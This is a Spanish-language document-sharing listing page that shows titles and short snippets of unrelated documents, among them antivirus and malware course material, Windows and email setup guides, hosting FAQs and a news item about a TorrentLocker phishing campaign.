Más detalles

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas

INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas INSTITUTO POLITECNICO NACIONAL Unidad Profesional Interdisciplonaria de Ingenierìa y Ciencias Sociales y Admonistrativas W8: wexplor VIROLOGÌA Y CRIPTOLOGÌA 4NM73 W8:INTERNET EXPLORER U5: FILE TRANSFER

Más detalles

Averigua que antivirus usa el ordenador en el que estás trabajando (Panda, McAfee, VirusScan, Nod32...).

Averigua que antivirus usa el ordenador en el que estás trabajando (Panda, McAfee, VirusScan, Nod32...). TAREA 2. INVESTIGACIÓN Y CONSOLIDACIÓN Objetivo: concretar las amenazas descubiertas en la actividad anterior así como identificar las vulnerabilidades más frecuentes y establecer mecanismos para poder

Más detalles

Auditoría de un PC con el pograma Aida32(ahora se llama EVEREST)

Auditoría de un PC con el pograma Aida32(ahora se llama EVEREST) Auditoría de un PC con el pograma Aida32(ahora se llama EVEREST) Cuando hablamos de auditoría lo primero que nos viene a la cabeza es una pregunta: por qué necesito auditar un ordenador? Son varios los

Más detalles

Soporte a Windows XP Professional

Soporte a Windows XP Professional Capítulo 6 Soporte a Windows XP Professional Al terminar este capítulo usted podrá: Identificar los problemas más comunes del sistema operativo; Explorar opciones para resolver problemas del sistema operativo;

Más detalles

MANUAL DE USUARIO ANTIVIRUS BANDA ANCHA

MANUAL DE USUARIO ANTIVIRUS BANDA ANCHA MANUAL DE USUARIO ANTIVIRUS BANDA ANCHA ÍNDICE 1 INTRODUCCIÓN... 4 1.1 ANTIVIRUS BANDA ANCHA... 4 1.2 ANTIVIRUS... 4 1.3 EFICACIA... 4 1.4 ACTUALIZACIONES... 4 2 REQUISITOS TÉCNICOS... 6 2.1 CONOCIMIENTOS

Más detalles

Mail movistar Empresa para Grundig GR980 Guía de Inicio Rápido

Mail movistar Empresa para Grundig GR980 Guía de Inicio Rápido Mail movistar Empresa para Grundig GR980 Guía de Inicio Rápido Reservados todos los derechos Guía de Inicio Rápido: Grundig GR980 Mail movistar Empresa (versión 5.0) Introducción Bienvenido a la guía de

Más detalles

MANUAL CLAROLINE PARA PROFESOR

MANUAL CLAROLINE PARA PROFESOR MANUAL CLAROLINE PARA PROFESOR 1 C O N T E N I D O I. INTRODUCCIÓN II.OBJETIVO DEL MANUAL III.OBJETIVO DE LA PLATAFORMA IV.DESCRIPCIÓN DEL SITIO V. ACCESO A LA PLATAFORMA Y OPCIONES DE LA PANTALLA DE BIENVENIDA

Más detalles

FAQs START WEB HOSTING

FAQs START WEB HOSTING FAQs START WEB HOSTING 1/7 ÍNDICE 1. Qué necesito para contratar el servicio de Start Web Hosting?... 3 2. Cómo realizo el pago mensual de mi servicio de Start Web Hosting?... 3 3. He contratado el servicio

Más detalles

Malware corto para software malintencionado es cualquier software utilizado para interrumpir, destruir y acceder a información sensible.

Malware corto para software malintencionado es cualquier software utilizado para interrumpir, destruir y acceder a información sensible. Informáticas I 2.4 Protegiendo un equipo cuando en la Web Existen un muchas vulnerabilidades cuando navegando por la web y probablemente has escuchado a todos pero qué significan realmente y cómo funcionan?

Más detalles

TorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos.

TorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos. TorrentLocker se enmascara tras Cryptolocker y juega al despiste en la suplantación de Correos. El pasado día 2 de diciembre de 2014 se detectó una campaña masiva de correos electrónicos cuyo objetivo

Más detalles

Microsoft Outlook Express

Microsoft Outlook Express Microsoft Outlook Express Para configurar Microsoft Outlook Express para recibir email, siga los siguientes pasos: Abra Outlook Express, click en herramientas y seleccione Cuentas. El siguiente grafico

Más detalles

Descarga e Instalación

Descarga e Instalación Descarga e Instalación Para la descarga de CCleaner seguiremos el enlace: http://www.piriform.com/ccleaner/builds Una vez descargado haremos doble clic con el ratón sobre el icono de CCleaner: Ahora aparecerá

Más detalles